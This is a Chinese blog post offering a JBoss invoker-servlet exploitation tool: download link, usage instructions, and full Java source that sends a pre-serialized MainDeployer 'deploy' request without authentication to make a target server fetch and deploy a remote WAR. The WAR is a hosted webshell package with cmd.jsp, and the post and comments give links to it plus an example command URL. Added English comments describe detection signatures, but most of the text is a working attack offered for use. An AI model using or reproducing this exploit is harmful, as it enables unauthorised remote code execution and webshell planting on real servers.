Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具

yzmm
免责声明:本站提供的所有工具及代码仅供交流学习,不得用于商业或黑客行为。
下载地址:Jboss漏洞利用工具.jar 链接:  密码: ucdl 功能说明:
安装jdk并配置好环境变量,然后填好参数先点获取即可,成功后会返回"请求成功."。
1、JMX/EJBInvokerServlet:
	host写IP或域名:127.0.0.1/p2j.cn
	port必填,如:8080
2、HtmlAdaptor:
	host写URL地址:http://localhost:8080
	port不需填写
3、war包推荐使用:http://javaweb.org/is.war,is.war里面带有几个版本的一句话和一个cmd.jsp
(如:http://xxx.com/is/?cmd.jsp?pwd=023&cmd=ls)如果使用自己的war包,
cmd功能需要默认配置(/is/cmd.jsp)war包只自带了mysql数据库所需要的jar,
连接oracle等其他数据库需要自己添加jar包

截图-JMX/EJBInvokerServlet:


截图-HtmlAdaptor:

核心源码:

package org.javaweb.jboss;
import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.InetSocketAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.SocketChannel;
import java.util.ArrayList;
import java.util.List;
/**
 * Proof-of-concept client from the article above: it concatenates the pre-serialized
 * Java object stream held in the byte arrays below and POSTs it to a JBoss
 * {@code /invoker/EJBInvokerServlet} endpoint over a raw TCP socket.
 *
 * <p>Defender notes, limited to what this class actually emits:
 * <ul>
 *   <li>Request line {@code POST /invoker/EJBInvokerServlet/ HTTP/1.1}, a
 *       {@code application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation}
 *       header and a {@code Java/1.6.0_21} User-Agent (see {@link #testEJBInvokerServlet}).</li>
 *   <li>The body begins with the Java serialization stream magic {@code AC ED 00 05} and
 *       carries the names {@code jboss.system:service=MainDeployer} and {@code deploy} in
 *       clear text (see the ASCII column beside {@code a2} and {@code a4}), so the payload
 *       is visible to plain inspection of the request body.</li>
 *   <li>The request carries no credentials; an endpoint that accepts it is reachable
 *       without authentication. Removing or access-restricting the invoker servlets on
 *       exposed instances removes the entry point this class relies on.</li>
 * </ul>
 *
 * <p>Not thread-safe: the payload fragments are mutable instance fields.
 */
public class Test {
	// Fragment 1: Java serialization header (AC ED 00 05) followed by the class
	// descriptors the ASCII column shows: org.jboss.invocation.MarshalledInvocation,
	// java.lang.Integer and org.jboss.invocation.MarshalledValue.
	byte[] a1 = new byte[]{
		(byte) 0xac,(byte) 0xed,0x00,0x05,0x73,0x72,0x00,0x29,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73, 								// ....sr.) org.jbos
		0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d,0x61,0x72, 											// s.invoca tion.Mar
		0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,											// shalledI nvocatio
		0x6e,(byte) 0xf6,0x06,(byte) 0x95,0x27,0x41,0x3e,(byte) 0xa4,(byte) 0xbe,0x0c,0x00,0x00,0x78,0x70,0x70,0x77,				// n...'A>. ....xppw
		0x08,0x78,(byte) 0x94,(byte) 0x98,0x47,(byte) 0xc1,(byte) 0xd0,0x53,(byte) 0x87,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,			// .x..G..S .sr..jav
		0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,0x72,0x12,(byte) 0xe2,										// a.lang.I nteger..
		(byte) 0xa0,(byte) 0xa4,(byte) 0xf7,(byte) 0x81,(byte) 0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,0x61,0x6c,0x75,			// .....8.. .I..valu
		0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4e,											// exr..jav a.lang.N
		0x75,0x6d,0x62,0x65,0x72,(byte) 0x86,(byte) 0xac,(byte) 0x95,0x1d,0x0b,(byte) 0x94,(byte) 0xe0,(byte) 0x8b,0x02,0x00,0x00,	// umber... ........
		0x78,0x70,0x26,(byte) 0x95,(byte) 0xbe,0x0a,0x73,0x72,0x00,0x24,0x6f,0x72,0x67,0x2e,0x6a,0x62,								// xp&...sr .$org.jb
		0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d,											// oss.invo cation.M
		0x61,0x72,0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x56,0x61,0x6c,0x75,0x65,(byte) 0xea,(byte) 0xcc,								// arshalle dValue..
		(byte) 0xe0,(byte) 0xd1,(byte) 0xf4,0x4a,(byte) 0xd0,(byte) 0x99,0x0c,0x00,0x00,0x78,0x70,0x77
	};
	// Five bytes written between a1 and a2; their meaning is not decoded here.
	byte[] aa = new byte[]{(byte) 0xeb,0x0,0x0,0x0,(byte) 0xe3};
	// Two bytes written immediately before the war URL bytes; not decoded here.
	byte[] ab = new byte[]{0x0,0x15};
	// Fragment 2: a second serialization header followed by an Object[] holding a
	// javax.management.ObjectName of "jboss.system:service=MainDeployer" and the
	// operation name "deploy" (per the ASCII column). The war URL is appended after it.
	byte[] a2 = new byte[]{
		(byte) 0xac,(byte) 0xed,0x00,0x05,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,									// .....ur. .[Ljava.
		0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,(byte) 0x90,(byte) 0xce,0x58,(byte) 0x9f,						// lang.Obj ect;..X.
		0x10,0x73,0x29,0x6c,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x04,0x73,0x72,0x00,											// .s)l...x p....sr.
		0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d,0x65,0x6e,											// .javax.m anagemen
		0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03,(byte) 0xa7,0x1b,										// t.Object Name....
		(byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62,0x6f,0x73,								// .m.....x pt.!jbos
		0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69,0x63,0x65,											// s.system :service
		0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78,0x74,0x00,											// =MainDep loyerxt.
		0x06,0x64,0x65,0x70,0x6c,0x6f,0x79,0x75,0x71,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,											// .deployu q.~.....
		0x01,0x74
	};
	// Fragment 3: a String[] descriptor ("[Ljava.lang.String;") with a single
	// "java.lang.String" element, written right after the war URL bytes.
	byte[] a3 = new byte[]{
		0x75,0x72,0x00,
		0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,																			// ur..[ Ljava.la
		0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,(byte) 0xad,(byte) 0xd2,0x56,(byte) 0xe7,(byte) 0xe9,0x1d,				// ng.Strin g;..V...
		0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x10,0x6a,0x61,											// {G...xp. ...t..ja
		0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67
	};
	// Fragment 4: trailing invocation metadata — org.jboss.invocation.InvocationKey,
	// InvocationType, the key name JMX_OBJECT_NAME and a second ObjectName of
	// "jboss.system:service=MainDeployer" (per the ASCII column).
	byte[] a4 = new byte[]{
		0x0d,(byte) 0xd3,
		(byte) 0xbe,(byte) 0xc9,0x78,0x77,0x04,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x22,0x6f,0x72,0x67,								// ..xw.... .sr."org
		0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,											// .jboss.i nvocatio
		0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x4b,0x65,0x79,(byte) 0xb8,										// n.Invoca tionKey.
		(byte) 0xfb,0x72,(byte) 0x84,(byte) 0xd7,(byte) 0x93,(byte) 0x85,(byte) 0xf9,0x02,0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64,	// .r...... ..I..ord
		0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00,0x00,0x05,0x73,0x71,0x00,0x7e,0x00,0x05,											// inalxp.. ..sq.~..
		0x77,0x0d,0x00,0x00,0x00,0x05,(byte) 0xac,(byte) 0xed,0x00,0x05,0x70,(byte) 0xfb,0x57,(byte) 0xa7,(byte) 0xaa,0x78,			// w....... ..p.W..x
		0x77,0x04,0x00,0x00,0x00,0x03,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x04,											// w.....sq .~......
		0x73,0x72,0x00,0x23,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e,											// sr.#org. jboss.in
		0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,											// vocation .Invocat
		0x69,0x6f,0x6e,0x54,0x79,0x70,0x65,0x59,(byte) 0xa7,0x3a,0x1c,(byte) 0xa5,0x2b,0x7c,(byte) 0xbf,0x02,						// ionTypeY .:..+|..
		0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64,0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00,											// ..I..ord inalxp..
		0x00,0x01,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x0a,0x70,0x74,0x00,0x0f,											// ..sq.~.. ....pt..
		0x4a,0x4d,0x58,0x5f,0x4f,0x42,0x4a,0x45,0x43,0x54,0x5f,0x4e,0x41,0x4d,0x45,0x73,											// JMX_OBJE CT_NAMEs
		0x72,0x00,0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d,											// r..javax .managem
		0x65,0x6e,0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03,											// ent.Obje ctName..
		(byte) 0xa7,0x1b,(byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62,						// ...m.... .xpt.!jb
		0x6f,0x73,0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69,											// oss.syst em:servi
		0x63,0x65,0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78,											// ce=MainD eployerx
		0x78
	};
	/**
	 * Opens a TCP connection to {@code host:port}, writes {@code requestData} once,
	 * waits until the first response bytes arrive, then closes the channel.
	 * The response content is discarded.
	 *
	 * @param host        target host name or IP address
	 * @param port        target TCP port
	 * @param requestData the complete request (HTTP head plus body) to write
	 * @throws Exception any {@link IOException} from connect/write/read is rethrown unchanged
	 */
	public void send(String host,int port,byte[] requestData) throws Exception {
		try {
			SocketChannel socketChannel = SocketChannel.open();
			// 5 s connect timeout; the channel is still in blocking mode here.
			socketChannel.socket().connect(new InetSocketAddress(host,port),5000);
			socketChannel.configureBlocking(false);
			ByteBuffer byteBuffer = ByteBuffer.allocate(512);
			socketChannel.write(ByteBuffer.wrap(requestData));
			// NOTE(review): busy-wait on a non-blocking channel. read() returns 0 while
			// nothing is pending and -1 once the peer closes; neither satisfies "> 0",
			// so a server that closes without sending anything leaves this loop spinning.
			while (true) {
				byteBuffer.clear();
				int readBytes = socketChannel.read(byteBuffer);
				if (readBytes > 0) {
					// Flipped but never read: the response bytes are thrown away.
					byteBuffer.flip();
					socketChannel.close();
					break;
				}
			}
		} catch (IOException e) {
			// NOTE(review): rethrow without cleanup — the channel is leaked if connect(),
			// write() or read() throws, since there is no finally / try-with-resources.
			throw e;
		}
	}
	/**
	 * Appends every element of {@code b} (boxed) to {@code ls}, in order.
	 *
	 * @param ls destination list, mutated in place
	 * @param b  bytes to append
	 */
	protected void addByte(List<Byte> ls,byte[] b){
		for(byte bb:b){
			ls.add(bb);
		}
	}
	/**
	 * Unboxes {@code b} into a fresh primitive array.
	 *
	 * @param b boxed bytes; a {@code null} element throws {@link NullPointerException}
	 *          on unboxing
	 * @return a new {@code byte[]} with the same contents, in order
	 */
	protected byte[] toByteArray(Byte[] b){
		// ByteArrayOutputStream needs no close(); write(int) stores the low 8 bits.
		ByteArrayOutputStream bos = new ByteArrayOutputStream();
		for(byte bs:b){
			bos.write(bs);
		}
		return bos.toByteArray();
	}
	/**
	 * Fetches {@code url} with {@link URL#openStream()} and returns its lines joined
	 * with CRLF. Not called by {@link #testEJBInvokerServlet} in this listing.
	 *
	 * <p>NOTE(review): the {@link InputStreamReader} is built without a charset, so the
	 * platform default is used; the reader is never closed; and the body is
	 * accumulated with {@code +=} on a String (quadratic for long responses).
	 *
	 * @param url the URL to read
	 * @return the response body, one line per {@code \r\n}-terminated segment
	 * @throws Exception any I/O or malformed-URL error from the underlying calls
	 */
	public String request(String url) throws Exception{
    	String str = "",tmp;
    	BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
		while((tmp=br.readLine())!=null){
			str+=tmp+"\r\n";
		}
		return str;
	}
	/**
	 * Builds the serialized body as {@code a1 + aa + a2 + ab + war + a3 + a4}, prefixes it
	 * with a hand-written HTTP/1.1 POST head whose {@code Content-Length} equals the body
	 * length, and hands the whole thing to {@link #send}.
	 *
	 * <p>Detection-relevant constants emitted here: the path
	 * {@code /invoker/EJBInvokerServlet/}, the {@code application/x-java-serialized-object}
	 * content type and the {@code Java/1.6.0_21} User-Agent.
	 *
	 * @param host target host name or IP address (also used in the Host header)
	 * @param port target TCP port (also used in the Host header)
	 * @param war  URL string embedded in the body; converted with {@code getBytes()},
	 *             i.e. the platform default charset
	 * @throws Exception propagated from {@link #send}
	 */
	public void testEJBInvokerServlet(String host,int port,String war) throws Exception{
		List<Byte> ls = new ArrayList<Byte>();
		addByte(ls, a1);
		addByte(ls,aa);
		addByte(ls, a2);
		addByte(ls, ab);
		addByte(ls, war.getBytes());
		addByte(ls, a3);
		addByte(ls, a4);
		byte[] b = toByteArray(ls.toArray(new Byte[ls.size()]));
		// HTTP head written by hand; the request/header lines below are the
		// observable wire signature of this client.
		String req = "POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n"+
				"ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n"+
				"Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n"+
				"User-Agent: Java/1.6.0_21\r\n"+
				"Host: "+host+":"+port+"\r\n"+
				"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n"+
				"Connection: keep-alive\r\n"+
				"Content-type: application/x-www-form-urlencoded\r\n"+
				"Content-Length: "+b.length+"\r\n\r\n";
		// Reuse the list for head + body; req.getBytes() again uses the platform charset.
		ls.clear();
		addByte(ls, req.getBytes());
		addByte(ls, b);
		send(host,port,toByteArray(ls.toArray(new Byte[ls.size()])));
	}
}

评论 (13)

大龄菜b
园长MM,问一下这个漏洞是不是jboss 6以及更高版本都不能利用吧
yzmm
6测试的时候可以,以上肯定不行。
小菜
可以百度云,或者稳定连接共享下is.war吗?
yzmm
<a href="http://pan.baidu.com/s/1EKwVm" rel="nofollow">iswin.war</a>
请教
楼主,为什么我按图中填写参数后在jboss目录无法下载到is.war呢,是我的使用方法不对吗,请指教,谢谢。
yzmm
经常换服务器jar可能有的时候访问不到哦
过客
园长可以把is.war,这个文件共享一下吗?
yzmm
http://ahack.net/is.war
我不告诉你
园长,你这么牛B 你老婆知道不
